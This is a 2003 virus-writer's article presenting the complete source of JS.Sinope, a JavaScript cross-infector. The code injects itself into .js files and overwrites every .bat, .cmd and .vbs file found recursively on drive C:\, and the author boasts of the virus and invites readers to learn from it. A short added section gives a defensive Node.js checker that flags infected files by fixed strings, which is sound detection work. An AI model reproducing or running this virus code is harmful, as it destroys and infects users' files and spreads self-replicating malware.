JS.Sinope by Second Part To Hell
www.spth.de.vu
written from May 2003 to 23 June 2003
Austria
This is a JavaScript cross infector. It infects JS files anywhere in the middle
of the code and it overwrites BAT and VBS files with a file, that contains the
javascript code of the virus and that makes a new file and runs it. It was hell
to write, because I could not use any special sign for JavaScript or Visual Basic
Script (chr(34)<--["]) or Batch (chr(37)<--[%], chr(60)<--[<], chr(62)<--[>])
because the program would stop without doing anything but showing an error message.
Because of that I had to define them at the start of the code. To infect JS files
it searches for the string 'function' in the victim code, and includes itself before
that code. And at the beginning of the code it calls the virus-function. To infect BAT
and VBS files it just overwrites its victims. All in all, I'm very proud that I'm
the author of this virus. :)
General Virus Information:
VirusName.................... JS.Sinope
VirusAuthor.................. Second Part To Hell[rRlf]
Infection Way................ Infects JS files anywhere in the
                              middle of the code, and overwrites
                              VBS and BAT files with the new generated
                              file, that makes a new file with the original
                              viruscode and runs it.
Payload...................... No
EPO.......................... Yes
Cross Infector............... Yes
  VBS files.................. Yes
  BAT files.................. Yes
  CMD files.................. Yes
At the end of my introduction I hope that you like my virus, and you will learn
something from it. Yes, there are things to learn from ;). I'm sure, that there
is no other .VBS / .JS (EPO) / .BAT / .CMD infector with just 40 lines out there.
OK, now look at the code and become crazy. (Like I!!!) :D
Final Note: There are 2 empty lines at the end of the virus. That's important,
otherwise it would not work!!!
-------------------------------------[JS.Sinope]-------------------------------------
Sinope()
function Sinope() {
var fso=WScript.CreateObject('Scripting.FileSystemObject')
var shell=WScript.CreateObject('WScript.Shell')
big=String.fromCharCode(62);
small=String.fromCharCode(60);
comma=String.fromCharCode(34);
percent=String.fromCharCode(37);
nl=String.fromCharCode(13)+String.fromCharCode(10);
myfile=fso.OpenTextFile(WScript.ScriptFullName); mycode='';
eval('for (i=0; i'+small+'500; i++) { code=myfile.ReadLine(); if (code=='+comma+'function Sinope() {'+comma+') { for (j=1; j'+small+'40; j++) { mycode+=code+nl; code=myfile.ReadLine(); i=666; } } }')
sino=fso.CreateTextFile('sinope.tmp').Write(mycode)
bat=fso.CreateTextFile('sinope.bat')
bat.WriteLine('cls'+nl+'@echo off'+nl+'echo Sinope()'+big+'javascript.js')
my=fso.OpenTextFile('sinope.tmp')
eval('for (i=0; i'+small+'1; i++) { mlc=my.ReadLine(); if (mlc!='+comma+'// End'+comma+') { i--; bat.WriteLine('+comma+'echo '+comma+'+mlc+big+big+'+comma+' javascript.js'+comma+'); } }')
bat.WriteLine('echo // End'+big+big+'javascript.js'+nl+'echo.'+big+big+'javascript.js'+nl+'echo.'+big+big+'javascript.js'+nl+'cscript javascript.js')
bat.Close(); my.Close();
vbsfile=fso.CreateTextFile('sinope.vbs')
vbsfile.WriteLine('set fso=WScript.CreateObject('+comma+'Scripting.FileSystemObject'+comma+')'+nl+'set shell=WScript.CreateObject('+comma+'WScript.Shell'+comma+')'+nl+'set a=fso.CreateTextFile('+comma+'javas.js'+comma+')'+nl+'a.WriteLine'+comma+'Sinope()'+comma)
my=fso.OpenTextFile('sinope.tmp')
eval('for (i=0; i'+small+'1; i++) { mlc=my.ReadLine(); if (mlc!='+comma+'// End'+comma+') { i--; vbsinclude(mlc) } }')
vbsfile.WriteLine('a.WriteLine '+comma+'// End'+comma+'+chr(13)+chr(10)+chr(13)+chr(10)+chr(13)+chr(10)'+nl+'a.Close'+nl+'shell.Run'+comma+'javas.js'+comma)
infsearch=fso.CreateTextFile('search.bat')
infsearch.WriteLine('cls'+nl+'@echo off'+nl+'assoc .cmd'+nl+'if errorlevel 1 goto bat'+nl+'for /r C:\ '+percent+percent+'a in (*.bat) do copy sinope.bat '+percent+percent+'a'+nl+'for /r C:\ '+percent+percent+'b in (*.cmd) do copy sinope.bat '+percent+percent+'b'+nl+'for /r C:\ '+percent+percent+'c in (*.vbs) do copy sinope.vbs '+percent+percent+'c'+nl+'echo.'+big+'js.lst'+nl+'for /r C:\ '+percent+percent+'d in (*.js) do echo '+percent+percent+'d '+big+big+'js.lst'+nl+'echo end'+big+big+'js.lst'+nl+'goto :EOF'+nl+':bat')
infsearch.Close(); my.Close();
shell.Run('search.bat')
eval('for (i=0; i'+small+'3000000; i++) { i--; i++; }')
javf=fso.OpenTextFile('js.lst')
eval('for (i=0; i'+small+'1; i++) { javline=javf.ReadLine(); if (javline!='+comma+'end'+comma+') { i--; if (fso.FileExists(javline)) { infjs(javline) } } }') }
function vbsinclude(mlc) {
vbsfile.WriteLine('a.WriteLine'+comma+mlc+comma) }
function infjs(victimname) {
var fso=WScript.CreateObject('Scripting.FileSystemObject'); var vicall=fso.OpenTextFile(victimname).ReadAll()
var victim=fso.OpenTextFile(victimname)
var vcode=''; var viccodes=''; vsearch='FUNCTION';
eval('for (i=0; i'+small+'vicall.length; i++) { vcode=victim.Read(1);'+nl+'if (vcode.toUpperCase()=='+comma+'F'+comma+') { for (j=1; j'+small+'8; j++) { vcode+=victim.Read(1); if (vcode.toUpperCase() !=vsearch.substring(0,j+1)) { j=666 }; i++; } }'+nl+'if (vcode.toUpperCase()==vsearch) { i=vicall.lenght+666 }'+nl+'if (vcode.toUpperCase()!=vsearch) { viccodes+=vcode } }')
virinc=fso.OpenTextFile(victimname, 2).Write('Sinope()'+nl+viccodes+nl+mycode+nl+'function'+victim.ReadAll()); victim.Close();
}
// End
-------------------------------------[End of JS.Sinope]-------------------------------------
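
For detection, the listing above leaves fixed strings in every file it touches: the `Sinope()` call line and the `function Sinope() {` ... `// End` body in JS hosts, and the `javascript.js` / `javas.js` rebuild lines in overwritten BAT, CMD and VBS files. The following is an added example, not part of the original article: a plain JavaScript checker (runs under Node.js) that classifies file contents by those strings. The function names `classify`, `isDroppedName` and `scanSamples` and all sample inputs are constructed for illustration.

```javascript
// Added example: working files the listing creates in its current directory.
const DROPPED = ['sinope.tmp', 'sinope.bat', 'sinope.vbs', 'search.bat',
                 'js.lst', 'javascript.js', 'javas.js'];

function splitName(file) {
  const base = file.split(/[\\/]/).pop().toLowerCase();
  const dot = base.lastIndexOf('.');
  return { base, ext: dot < 0 ? '' : base.slice(dot) };
}

function isDroppedName(file) {
  return DROPPED.includes(splitName(file).base);
}

// Returns 'js-infected', 'bat-dropper', 'vbs-dropper' or null.
function classify(file, text) {
  const { ext } = splitName(file);
  const lines = text.split(/\r?\n/).map((l) => l.trim());
  const has = (re) => lines.some((l) => re.test(l));
  if (ext === '.js') {
    // Layout written by infjs(): call line, host prefix, virus body, '// End'.
    const body = lines.indexOf('function Sinope() {');
    const end = lines.indexOf('// End', body + 1);
    return lines[0] === 'Sinope()' && body > 0 && end > body ? 'js-infected' : null;
  }
  if (ext === '.bat' || ext === '.cmd') {
    return has(/^echo Sinope\(\)>\s*javascript\.js$/i) &&
      has(/^cscript javascript\.js$/i) ? 'bat-dropper' : null;
  }
  if (ext === '.vbs') {
    return has(/^a\.WriteLine\s*"Sinope\(\)"$/i) &&
      has(/^shell\.Run\s*"javas\.js"$/i) ? 'vbs-dropper' : null;
  }
  return null;
}

// Constructed samples; the virus body is replaced by a placeholder comment.
const SAMPLES = {
  'C:\\web\\menu.js': 'Sinope()\r\nvar n = 1;\r\nfunction Sinope() {\r\n/* body */\r\n}\r\n// End\r\n\r\nfunction menu() {}',
  'C:\\web\\clean.js': 'function menu() { return 1; }\r\n// End',
  'C:\\tools\\build.cmd': 'cls\r\n@echo off\r\necho Sinope()>javascript.js\r\necho // End>>javascript.js\r\ncscript javascript.js',
  'C:\\tools\\login.vbs': 'set a=fso.CreateTextFile("javas.js")\r\na.WriteLine"Sinope()"\r\na.Close\r\nshell.Run"javas.js"',
};

function scanSamples() {
  return Object.fromEntries(
    Object.entries(SAMPLES).map(([file, text]) => [file, classify(file, text)]));
}
console.log(scanSamples());
```

Content matches are the strong signal. Several of the dropped names (`search.bat`, `js.lst`, `javascript.js`) are generic, so treat a hit from `isDroppedName` alone as a prompt to inspect the file rather than as a verdict.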